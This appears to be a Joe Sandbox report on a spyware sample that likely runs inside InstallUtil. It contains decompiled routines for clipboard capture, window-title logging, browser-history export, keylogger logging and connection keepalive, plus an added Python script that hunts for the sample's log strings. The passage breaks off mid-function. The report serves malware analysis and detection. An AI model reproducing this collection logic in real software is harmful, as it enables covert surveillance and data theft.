                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseEnumInfoOpenQuerysend
                                                                      • String ID: `F
                                                                      • API String ID: 3114080316-3520748611
                                                                      • Opcode ID: adad6ade140c573f75862a222352a099cfa88a94b3371173b29bec94d9a321c8
                                                                      • Instruction ID: f02e223a6181902d2c2455f7e3c70963f1e794a1f5a9acb1261d3f965fe014ae
                                                                      • Opcode Fuzzy Hash: adad6ade140c573f75862a222352a099cfa88a94b3371173b29bec94d9a321c8
                                                                      • Instruction Fuzzy Hash: E641BC306082445AC324F726D856AEF7395AF92348F40483FB146A31E2EF38594AC69F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID: <@$R@
                                                                      • API String ID: 269201875-1363467631
                                                                      • Opcode ID: 0eb04e60c130fb67d0308cf5eab7e9a5277a4a3e363255724a29e7ea33b8f328
                                                                      • Instruction ID: 239a96016a45d6f290135f0482fc91260e97591c8cbd1ad33fca869b2c1eb28b
                                                                      • Opcode Fuzzy Hash: 0eb04e60c130fb67d0308cf5eab7e9a5277a4a3e363255724a29e7ea33b8f328
                                                                      • Instruction Fuzzy Hash: B1418C32B00714CFCB18DFA9D8C196EB7B1EB8D320B1581AAE515EB3A1D7349C45CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E0040400C(void* __ebx) {
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				char _v76;
                                                                      				char _v100;
                                                                      				char _v124;
                                                                      				char _v148;
                                                                      				char _v172;
                                                                      				short _v692;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				struct HINSTANCE__* _t81;
                                                                      				struct HINSTANCE__* _t84;
                                                                      				void* _t85;
                                                                      				void* _t86;
                                                                      
                                                                      				_t48 = __ebx;
                                                                      				_t81 = 0;
                                                                      				GetModuleFileNameW(0,  &_v692, 0x104);
                                                                      				E0040209F(__ebx,  &_v52);
                                                                      				E00419012( &_v28, 0x30, E00401F6B(E00418114( &_v76)));
                                                                      				E00401F98();
                                                                      				E00401F6B(0x46e1b0);
                                                                      				E004150C2(E00401EC4(E00402FD4(_t48,  &_v100, E004042DD(_t48,  &_v124, E004042BC(_t48,  &_v148,  &_v692, _t85, 0, E0040413E(__ebx,  &_v172, 0x30, _t85, L" /sort \"Visit Time\" /stext \"")), _t85, 0,  &_v28), 0, _t85, 0, "\"")));
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				_t84 = 0;
                                                                      				while(1) {
                                                                      					E00401EC4( &_v28);
                                                                      					_t80 =  &_v52;
                                                                      					if(E004189A5( &_v52) != 0) {
                                                                      						break;
                                                                      					}
                                                                      					Sleep(0xfa);
                                                                      					_t84 =  &(_t84->i);
                                                                      					if(_t84 < 0x14) {
                                                                      						continue;
                                                                      					} else {
                                                                      					}
                                                                      					L5:
                                                                      					E00401EC9();
                                                                      					E00401F98();
                                                                      					return _t81;
                                                                      				}
                                                                      				E004020B6(_t48, _t86 - 0x18,  &_v52, __eflags,  &_v52);
                                                                      				_push(0x9d);
                                                                      				E00404A78(0x46e130, _t80, __eflags);
                                                                      				_t81 = 1;
                                                                      				__eflags = 1;
                                                                      				goto L5;
                                                                      			}

                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404026
                                                                        • Part of subcall function 00418114: GetCurrentProcessId.KERNEL32(00000000,76F1FBB0,00000000,?,?,?,?,004610EC,0040B043,.vbs,?,?,?,?,?,0046E5A0), ref: 0041813B
                                                                        • Part of subcall function 004150C2: CloseHandle.KERNEL32(004040B5,?,004040B5,00460E24), ref: 004150D8
                                                                        • Part of subcall function 004150C2: CloseHandle.KERNEL32(00460E24,?,004040B5,00460E24), ref: 004150E1
                                                                        • Part of subcall function 004189A5: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00408F6D), ref: 004189BE
                                                                      • Sleep.KERNEL32(000000FA,00460E24), ref: 004040F8
                                                                      Strings
                                                                      • /sort "Visit Time" /stext ", xrefs: 00404072
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                      • String ID: /sort "Visit Time" /stext "
                                                                      • API String ID: 368326130-1573945896
                                                                      • Opcode ID: 582886a25ec431a6a9968fc70793b2aaa12c77b31c401f2cebf02ef1c28a8f56
                                                                      • Instruction ID: b031e74bed0b396cb6902618a6d910056206179634ae4f3c8ca1473975d0df44
                                                                      • Opcode Fuzzy Hash: 582886a25ec431a6a9968fc70793b2aaa12c77b31c401f2cebf02ef1c28a8f56
                                                                      • Instruction Fuzzy Hash: 83317071A102195ACB14F7B6DC569EE73B5AF91308F00047FF506B71D2EF38198ACA99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E0044D8A8(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                                      				int _v8;
                                                                      				void* __esi;
                                                                      				int _t15;
                                                                      				int _t16;
                                                                      				signed int _t17;
                                                                      				signed int _t23;
                                                                      				signed int _t25;
                                                                      				signed int _t26;
                                                                      				signed int _t27;
                                                                      				void* _t30;
                                                                      				void* _t31;
                                                                      				intOrPtr _t32;
                                                                      				intOrPtr _t33;
                                                                      				intOrPtr* _t34;
                                                                      				intOrPtr* _t36;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t23 = _a4;
                                                                      				_push(_t34);
                                                                      				if(_t23 == 0) {
                                                                      					L21:
                                                                      					_t15 = E0044492D(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
                                                                      					__eflags = _t15;
                                                                      					if(_t15 != 0) {
                                                                      						_t16 = _v8;
                                                                      						__eflags = _t16;
                                                                      						if(_t16 == 0) {
                                                                      							_t16 = GetACP();
                                                                      						}
                                                                      						L25:
                                                                      						return _t16;
                                                                      					}
                                                                      					L22:
                                                                      					_t16 = 0;
                                                                      					goto L25;
                                                                      				}
                                                                      				_t17 = 0;
                                                                      				if( *_t23 == 0) {
                                                                      					goto L21;
                                                                      				}
                                                                      				_t34 = 0x45b2f8;
                                                                      				_t25 = _t23;
                                                                      				while(1) {
                                                                      					_t30 =  *_t25;
                                                                      					if(_t30 !=  *_t34) {
                                                                      						break;
                                                                      					}
                                                                      					if(_t30 == 0) {
                                                                      						L7:
                                                                      						_t26 = _t17;
                                                                      						L9:
                                                                      						if(_t26 == 0) {
                                                                      							goto L21;
                                                                      						}
                                                                      						_t36 = 0x45b300;
                                                                      						_t27 = _t23;
                                                                      						while(1) {
                                                                      							_t31 =  *_t27;
                                                                      							if(_t31 !=  *_t36) {
                                                                      								break;
                                                                      							}
                                                                      							if(_t31 == 0) {
                                                                      								L17:
                                                                      								_t48 = _t17;
                                                                      								if(_t17 != 0) {
                                                                      									_t16 = E004383C2(_t23, _t23);
                                                                      									goto L25;
                                                                      								}
                                                                      								if(E0044492D(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
                                                                      									goto L22;
                                                                      								}
                                                                      								_t16 = _v8;
                                                                      								goto L25;
                                                                      							}
                                                                      							_t32 =  *((intOrPtr*)(_t27 + 2));
                                                                      							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
                                                                      								break;
                                                                      							}
                                                                      							_t27 = _t27 + 4;
                                                                      							_t36 = _t36 + 4;
                                                                      							if(_t32 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L17;
                                                                      						}
                                                                      						asm("sbb eax, eax");
                                                                      						_t17 = _t17 | 0x00000001;
                                                                      						__eflags = _t17;
                                                                      						goto L17;
                                                                      					}
                                                                      					_t33 =  *((intOrPtr*)(_t25 + 2));
                                                                      					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
                                                                      						break;
                                                                      					}
                                                                      					_t25 = _t25 + 4;
                                                                      					_t34 = _t34 + 4;
                                                                      					if(_t33 != 0) {
                                                                      						continue;
                                                                      					}
                                                                      					goto L7;
                                                                      				}
                                                                      				asm("sbb edx, edx");
                                                                      				_t26 = _t25 | 0x00000001;
                                                                      				__eflags = _t26;
                                                                      				goto L9;
                                                                      			}

                                                                      APIs
                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044DB03,?,00000050,?,?,?,?,?), ref: 0044D983
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ACP$OCP
                                                                      • API String ID: 0-711371036
                                                                      • Opcode ID: 187f9a954186ed601c69536ca0f0e8db646af36685fb63c4031eb86ad161f795
                                                                      • Instruction ID: d97db5b55563d882cb1f03f0d55d669f44e4725deecd1e114deb8eb659ded43a
                                                                      • Opcode Fuzzy Hash: 187f9a954186ed601c69536ca0f0e8db646af36685fb63c4031eb86ad161f795
                                                                      • Instruction Fuzzy Hash: 762103E2E00205E6FB249E65C801BA7B3A6EF54B14F16853BE90AD7300E73ADD41C398
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E00409DD6(void* __ecx) {
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				char _v76;
                                                                      				char _v100;
                                                                      				char _v124;
                                                                      				char _v148;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t23;
                                                                      				void* _t27;
                                                                      				void* _t30;
                                                                      				void* _t78;
                                                                      				void* _t84;
                                                                      				void* _t85;
                                                                      				void* _t86;
                                                                      
                                                                      				_t86 = _t85 - 0x94;
                                                                      				_t78 = __ecx;
                                                                      				if( *0x46ff84 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                                                                      					E00430D17(0x46ff84);
                                                                      					_t89 =  *0x46ff84 - 0xffffffff;
                                                                      					if( *0x46ff84 == 0xffffffff) {
                                                                      						E00401F46(0x46ff88, 0x46ff88);
                                                                      						E004310BE(_t89, E00453D3C);
                                                                      						E00430CD8(0x46ff84, 0x46ff84);
                                                                      					}
                                                                      				}
                                                                      				E00409D9C( &_v28);
                                                                      				_t23 = E0040A060(0x46ff88);
                                                                      				_t90 = _t23;
                                                                      				if(_t23 == 0) {
                                                                      					E00409F8F(0x46ff88,  &_v28);
                                                                      					_t27 = E004078C9(_t90);
                                                                      					_t91 = _t27;
                                                                      					if(_t27 != 0) {
                                                                      						E00402053(0x46ff88,  &_v76, 0x4610ec, _t84, "\r\n[End of clipboard]\r\n");
                                                                      						E00402053(0x46ff88,  &_v52, 0x4610ec, _t84, "\r\n[Text copied to clipboard]\r\n");
                                                                      						_t30 = E00418385( &_v148,  &_v76);
                                                                      						E00402F65(_t86 - 0x18, E004042DD(0x46ff88,  &_v100, E00418385( &_v124,  &_v52), _t84, _t91, 0x46ff88), _t30);
                                                                      						E00408D60(_t78);
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      					}
                                                                      				}
                                                                      				return E00401EC9();
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 004310BE: __onexit.LIBCMT ref: 004310C4
                                                                      • __Init_thread_footer.LIBCMT ref: 00409E25
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer__onexit
                                                                      • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                      • API String ID: 1881088180-3686566968
                                                                      • Opcode ID: 5270eb18190829998c5ee4afee35cb001490fc847153f81b8fba0dfd99147eb9
                                                                      • Instruction ID: 27ac64323c14a5b5afec18ba9529d964e25902238e7a433e078a36faa8fe32bc
                                                                      • Opcode Fuzzy Hash: 5270eb18190829998c5ee4afee35cb001490fc847153f81b8fba0dfd99147eb9
                                                                      • Instruction Fuzzy Hash: 85217F31A101094ACB08FB65E8929EEB379AF55308F50017FF501771E3EF385D4A869D
                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			// Called with a window handle (_a4): reads its title (up to 0x12c wide chars) with
                                                                      			// GetWindowTextW, tests IsWindowVisible, formats the handle with "%i" and joins the
                                                                      			// pieces with the string helpers below. These are the building blocks of
                                                                      			// window-title logging; the exact output format lives in the string constants
                                                                      			// at 0x46737c / 0x467228, which the decompiler does not resolve here.
                                                                      			E00414587(void* __edx, void* __edi, struct HWND__* _a4) {
                                                                      				short _v604;
                                                                      				char _v632;
                                                                      				void* _v636;
                                                                      				char _v656;
                                                                      				void* _v660;
                                                                      				char _v680;
                                                                      				void* _v684;
                                                                      				char _v704;
                                                                      				void* _v708;
                                                                      				char _v728;
                                                                      				void* _v732;
                                                                      				char _v752;
                                                                      				void* _v756;
                                                                      				char _v776;
                                                                      				void* _v780;
                                                                      				char _v796;
                                                                      				char _v800;
                                                                      				void* _v804;
                                                                      				char _v808;
                                                                      				char _v812;
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				void* _t34;
                                                                      				signed int _t53;
                                                                      				void* _t79;
                                                                      				void* _t88;
                                                                      
                                                                      				_t87 = __edi;
                                                                      				_t79 = __edx;
                                                                      				_push(_t53);
                                                                      				GetWindowTextW(_a4,  &_v604, 0x12c);
                                                                      				_t93 = IsWindowVisible(_a4);
                                                                      				_t54 = _t53 & 0xffffff00 | IsWindowVisible(_a4) != 0x00000000;
                                                                      				E00411B96( &_v808, "%i", _a4);
                                                                      				E0040413E(_t53 & 0xffffff00 | IsWindowVisible(_a4) != 0x00000000,  &_v796, _t79, _t88,  &_v604);
                                                                      				_t34 = E00418445(_t54,  &_v632,  &_v800);
                                                                      				_t12 =  &_v812; // 0x46737c
                                                                      				L00403336(E0040793B(_t54,  &_v776, E00402E61( &_v752, E0040793B(_t54,  &_v728, E0040793B(_t54,  &_v704, E0040793B(_t54,  &_v680, E004182D1(_t54,  &_v656, _t54 & 0x000000ff), __edi, _t88, _t93, 0x46737c), __edi, _t88, _t93, _t12), _t87, _t88, _t93, 0x46737c), _t34), _t87, _t88, _t93, 0x467228));
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401EC9();
                                                                      				return 1;
                                                                      			}





























                                                                      Instruction address column (its alignment to the C lines above was lost in extraction): 0x00414587 .. 0x004146b4

                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID: Window$TextVisible
                                                                      • String ID: |sF
                                                                      • API String ID: 1670992164-956794550
                                                                      • Opcode ID: 3400abf12a70da47d4fed9586d227fb93eb7beee062b89c6d042c1fe71282703
                                                                      • Instruction ID: 27ebeaa6ea1a3d25e70583192487b33e816497d2748b4b703055b86ca9857c48
                                                                      • Opcode Fuzzy Hash: 3400abf12a70da47d4fed9586d227fb93eb7beee062b89c6d042c1fe71282703
                                                                      • Instruction Fuzzy Hash: 092161715082455BC314FB21DC52AEFB3E9AF90348F10493FB599960F1FF34AA4AC65A
                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 97%
                                                                      			// Buffer setup for the stream object selected by E0043956E(1) or E0043956E(2):
                                                                      			// unless flag bits 0x4c0 are already set at +0xc, it installs a 0x1000-byte heap
                                                                      			// buffer (E004421F7) cached in the global at 0x46da04 / 0x46da08, and falls back
                                                                      			// to the 2-byte inline field at +0x14 if that allocation fails. The shape resembles
                                                                      			// statically linked C runtime stdio code rather than sample-specific logic.
                                                                      			E0044707B(void* __eflags, char _a4) {
                                                                      				void* _t14;
                                                                      				void* _t16;
                                                                      				intOrPtr _t19;
                                                                      				intOrPtr _t25;
                                                                      				intOrPtr _t34;
                                                                      				intOrPtr* _t37;
                                                                      				intOrPtr* _t38;
                                                                      
                                                                      				_t1 =  &_a4; // 0x46e278
                                                                      				_t38 =  *_t1;
                                                                      				if(E0044FDE4(E00445D3D(_t38)) != 0) {
                                                                      					_t14 = E0043956E(1);
                                                                      					_t25 = 2;
                                                                      					if(_t38 != _t14) {
                                                                      						if(_t38 != E0043956E(_t25)) {
                                                                      							L12:
                                                                      							_t16 = 0;
                                                                      							L13:
                                                                      							return _t16;
                                                                      						}
                                                                      						_t37 = 0x46da08;
                                                                      						L6:
                                                                      						 *0x46d3b0 =  *0x46d3b0 + 1;
                                                                      						_t31 = _t38 + 0xc;
                                                                      						if(( *(_t38 + 0xc) & 0x000004c0) != 0) {
                                                                      							goto L12;
                                                                      						}
                                                                      						asm("lock or [ecx], eax");
                                                                      						_t19 =  *_t37;
                                                                      						if(_t19 != 0) {
                                                                      							L10:
                                                                      							 *((intOrPtr*)(_t38 + 4)) = _t19;
                                                                      							 *_t38 =  *_t37;
                                                                      							 *((intOrPtr*)(_t38 + 8)) = 0x1000;
                                                                      							 *((intOrPtr*)(_t38 + 0x18)) = 0x1000;
                                                                      							L11:
                                                                      							_t16 = 1;
                                                                      							goto L13;
                                                                      						}
                                                                      						 *_t37 = E004421F7(_t31, 0x1000);
                                                                      						E004427C2(0);
                                                                      						_t19 =  *_t37;
                                                                      						if(_t19 != 0) {
                                                                      							goto L10;
                                                                      						}
                                                                      						_t34 = _t38 + 0x14;
                                                                      						 *((intOrPtr*)(_t38 + 8)) = _t25;
                                                                      						 *((intOrPtr*)(_t38 + 4)) = _t34;
                                                                      						 *_t38 = _t34;
                                                                      						 *((intOrPtr*)(_t38 + 0x18)) = _t25;
                                                                      						goto L11;
                                                                      					}
                                                                      					_t37 = 0x46da04;
                                                                      					goto L6;
                                                                      				}
                                                                      				return 0;
                                                                      			}










                                                                      Instruction address column (its alignment to the C lines above was lost in extraction): 0x00447081 .. 0x0044712c; the 0x00000000 entries are the decompiler's jump/return placeholders

                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID: xFxF$R@
                                                                      • API String ID: 269201875-1714259940
                                                                      • Opcode ID: 085adc33c3f0471e1bc9cad8f3ce719c1df242cd074f88ca2ed2ad440ab75490
                                                                      • Instruction ID: cca4b4ea588b148984af5d625e58622bee80ed0c58c6d888bb219ab30b57353e
                                                                      • Opcode Fuzzy Hash: 085adc33c3f0471e1bc9cad8f3ce719c1df242cd074f88ca2ed2ad440ab75490
                                                                      • Instruction Fuzzy Hash: 6B1129715093029FF7209F2AE441B53B3E8EF14398F20442FF58597341EB79D8828759
                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			// Keepalive bookkeeping: _a4 is the new timeout value. With the global at 0x46e8ac
                                                                      			// clear it returns 0 and does nothing. Otherwise, if the flag at 0x46e8cc is set it
                                                                      			// timestamps (GetLocalTime) and emits "Connection KeepAlive  | Enabled | Timeout: "
                                                                      			// plus the value through E00417D02, then clears the flag; if the value differs from
                                                                      			// the cached one at 0x46e8c4 and 0x46e8cd is set, it logs again. L7 stores _a4 at
                                                                      			// 0x46e8c4 and sets 0x46e8cd, so the change-detection branch is live from the second
                                                                      			// call on.
                                                                      			E00404FCB(intOrPtr _a4) {
                                                                      				char _v24;
                                                                      				void* _v28;
                                                                      				struct _SYSTEMTIME _v40;
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				void* _t11;
                                                                      				void* _t17;
                                                                      				void* _t35;
                                                                      				intOrPtr _t36;
                                                                      				void* _t38;
                                                                      				void* _t42;
                                                                      				void* _t43;
                                                                      				void* _t47;
                                                                      
                                                                      				if( *0x46e8ac == 0) {
                                                                      					__eflags = 0;
                                                                      					return 0;
                                                                      				}
                                                                      				_t36 = _a4;
                                                                      				if( *0x46dd00 == 0) {
                                                                      					L7:
                                                                      					 *0x46e8c8 =  *0x46e8c8 & 0x00000000;
                                                                      					 *0x46e8cd = 1;
                                                                      					 *0x46e8c4 = _t36;
                                                                      					return 1;
                                                                      				}
                                                                      				_t46 =  *0x46e8cc;
                                                                      				_t22 = "Connection KeepAlive  | Enabled | Timeout: ";
                                                                      				_t37 = "i";
                                                                      				if( *0x46e8cc != 0) {
                                                                      					GetLocalTime( &_v40);
                                                                      					_t17 = E004182D1("Connection KeepAlive  | Enabled | Timeout: ",  &_v24, _t36);
                                                                      					_t42 = _t38 - 0x18;
                                                                      					E004052D4(_t22, _t42, _t22, "i", _t46, _t17);
                                                                      					_t43 = _t42 - 0x14;
                                                                      					E00402053(_t22, _t43, _t22, "i", _t37);
                                                                      					E00417D02(_t22, _t35);
                                                                      					_t38 = _t43 + 0x30;
                                                                      					E00401F98();
                                                                      					 *0x46e8cc = 0;
                                                                      				}
                                                                      				_t47 =  *0x46e8c4 - _t36; // 0x3c
                                                                      				if(_t47 != 0) {
                                                                      					_t48 =  *0x46e8cd;
                                                                      					if( *0x46e8cd != 0) {
                                                                      						GetLocalTime( &_v40);
                                                                      						_t11 = E004182D1(_t22,  &_v24, _t36);
                                                                      						_t39 = _t38 - 0x18;
                                                                      						E004052D4(_t22, _t38 - 0x18, _t22, _t37, _t48, _t11);
                                                                      						E00402053(_t22, _t39 - 0x14, _t22, _t37, _t37);
                                                                      						E00417D02(_t22, _t35);
                                                                      						E00401F98();
                                                                      					}
                                                                      				}
                                                                      				goto L7;
                                                                      			}
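                                                                      As an added triage example, not part of the Joe Sandbox report or of the sample's code: the log-format strings recovered in the listings above ("[Text copied to clipboard]", "[End of clipboard]" and "Connection KeepAlive  | Enabled | Timeout: ") are usable as hunting indicators in other process dumps. The Python below scans a byte buffer for them in both ASCII and UTF-16LE, matches the internal whitespace loosely because the report itself shows the keepalive line with both one and two spaces after "KeepAlive", and parses the numeric timeout that follows the keepalive marker. The indicator names, the helper functions and the SAMPLE buffer are my own constructions, not artefacts from this analysis.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Marker strings taken from the decompiled listings on this page. Internal
# whitespace is matched loosely because the report shows the keepalive line
# with both one and two spaces. The indicator names are this example's own.
WS = object()  # token: a possibly empty run of spaces/tabs
MARKERS = {
    "clipboard_start": ["[Text copied to clipboard]"],
    "clipboard_end":   ["[End of clipboard]"],
    "keepalive_log":   ["Connection KeepAlive", WS, "|", WS, "Enabled",
                        WS, "|", WS, "Timeout:"],
}
ENCODINGS = ("ascii", "utf-16le")


@dataclass
class Hit:
    name: str       # indicator name from MARKERS
    encoding: str   # "ascii" or "utf-16le"
    offset: int     # byte offset of the match in the scanned buffer
    length: int     # match length in bytes
    text: str       # decoded match text


def _compile(tokens, encoding: str) -> "re.Pattern[bytes]":
    """Build a bytes regex for the token list in the given encoding."""
    parts = []
    for tok in tokens:
        if tok is WS:
            # ASCII: spaces/tabs; UTF-16LE: the same code units, each NUL-padded
            parts.append(rb"[ \t]*" if encoding == "ascii" else rb"(?:[ \t]\x00)*")
        else:
            parts.append(re.escape(tok.encode(encoding)))
    return re.compile(b"".join(parts))


def scan(data: bytes) -> List[Hit]:
    """Return every marker occurrence in data, in both encodings, sorted by offset."""
    hits: List[Hit] = []
    for name, tokens in MARKERS.items():
        for enc in ENCODINGS:
            for m in _compile(tokens, enc).finditer(data):
                hits.append(Hit(name, enc, m.start(), m.end() - m.start(),
                                m.group(0).decode(enc)))
    hits.sort(key=lambda h: h.offset)
    return hits


def keepalive_timeout(data: bytes, hit: Hit) -> Optional[int]:
    """Parse the integer that follows a keepalive_log hit (the logged timeout)."""
    if hit.name != "keepalive_log":
        return None
    tail = data[hit.offset + hit.length:]
    if hit.encoding == "ascii":
        m = re.match(rb"[ \t]*(\d+)", tail)
    else:
        m = re.match(rb"(?:[ \t]\x00)*((?:[0-9]\x00)+)", tail)
    return int(m.group(1).decode(hit.encoding)) if m else None


def summarize(hits: List[Hit]) -> dict:
    """Count hits per indicator name, for a one-line verdict."""
    counts: dict = {}
    for h in hits:
        counts[h.name] = counts.get(h.name, 0) + 1
    return counts


# Constructed sample buffer (not taken from the report): a UTF-16LE clipboard
# capture, odd-length padding so the next string is not 2-byte aligned, then
# an ASCII keepalive line written with two spaces, as in the listing above.
SAMPLE = (
    b"\x00" * 16
    + "[Text copied to clipboard]".encode("utf-16le")
    + "hunter2".encode("utf-16le")
    + "[End of clipboard]".encode("utf-16le")
    + b"\x00" * 7
    + b"Connection KeepAlive  | Enabled | Timeout: 60\r\n"
    + b"\x90" * 8
)

if __name__ == "__main__":
    found = scan(SAMPLE)
    for h in found:
        print(f"{h.offset:#010x} {h.encoding:8} {h.name:16} {h.text!r}")
    print("counts:", summarize(found))
    for h in found:
        if h.name == "keepalive_log":
            print("keepalive timeout:", keepalive_timeout(SAMPLE, h))
```

To use it on a real dump, read the .sdmp region as bytes and pass it to scan(); because the regexes are byte-based, misaligned UTF-16 strings are still found at their true offset, which a decode-then-search approach would miss.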
















                                                                      Instruction address column (its alignment to the C lines above was lost in extraction): 0x00404fd8 .. 0x004050b0; the 0x00000000 entries are the decompiler's jump/return placeholders

                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?), ref: 00405007
                                                                        • Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C
                                                                      • GetLocalTime.KERNEL32(?), ref: 0040505E
                                                                      Strings
                                                                      • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FF6
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID: LocalTime
                                                                      • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                      • API String ID: 481472006-507513762
                                                                      • Opcode ID: fc587288f28f62f5b402857db45c8487fe39f8f015990503ffa37c7c8aeeecd1
                                                                      • Instruction ID: 228c11a983c4c7ed4e75f6a715638b414b5a2672d16d4ff64597e96d813b3123
                                                                      • Opcode Fuzzy Hash: fc587288f28f62f5b402857db45c8487fe39f8f015990503ffa37c7c8aeeecd1
                                                                      • Instruction Fuzzy Hash: 792104A19042801BDB04F737984A36F7BE4AB42308F44447EF841172E2EABD554C8B9B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

C-Code - Quality: 73%
			/* Editorial reading of the decompiled routine (not part of the Joe Sandbox
			   output): a timestamped log-line writer. When the global flag at 0x46dd00
			   is non-zero it calls GetLocalTime, formats the time as
			   "%02i:%02i:%02i:%03i ", joins the two string arguments with " | ",
			   appends "\n" and hands the result to E00417B70. E004096DC calls it with
			   "Online Keylogger Stopped". E00401F98 runs once for each of the four
			   temporaries (_v28, _v52, _v76, _v100) and once for each by-value argument
			   (_a4, _a28), which is consistent with it being a string destructor.
			   _t57 and _t62 are used without a declaration; that is how the decompiler
			   emitted them. */
			E00417D02(void* __ebx, void* __edi, char _a4, char _a28) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed short _v106;
				signed short _v108;
				void* __ebp;
				void* _t57;
				signed int _t58;
				struct _SYSTEMTIME* _t60;

				_t60 = (_t58 & 0xfffffff8) - 0x70;              /* 8-byte aligned SYSTEMTIME on the stack */
				_t62 =  *0x46dd00;
				if( *0x46dd00 != 0) {                           /* logging enabled? */
					GetLocalTime(_t60);
					_push(_v102 & 0x0000ffff);                  /* WORD fields of the SYSTEMTIME become */
					_push(_v104 & 0x0000ffff);                  /* the %02i/%03i operands */
					_push(_v106 & 0x0000ffff);
					/* innermost call formats the timestamp; each E0040793B / E00402ED0 call
					   appends one piece (" | ", the second argument, "\n") into the next temporary */
					E00417B70(_t62,
					          E00401F6B(
					              E0040793B(__ebx,  &_v100,
					                  E00402ED0(__ebx,  &_v76,
					                      E0040793B(__ebx,  &_v52,
					                          E004052F5( &_v28, "%02i:%02i:%02i:%03i ", _t57,  &_a4),
					                          __edi, _t57, _t62, " | "),
					                      _t57, _t62,  &_a28),
					                  __edi, _t57, _t62, "\n")),
					          _v108 & 0x0000ffff);
					E00401F98();                                /* release the four temporaries */
					E00401F98();
					E00401F98();
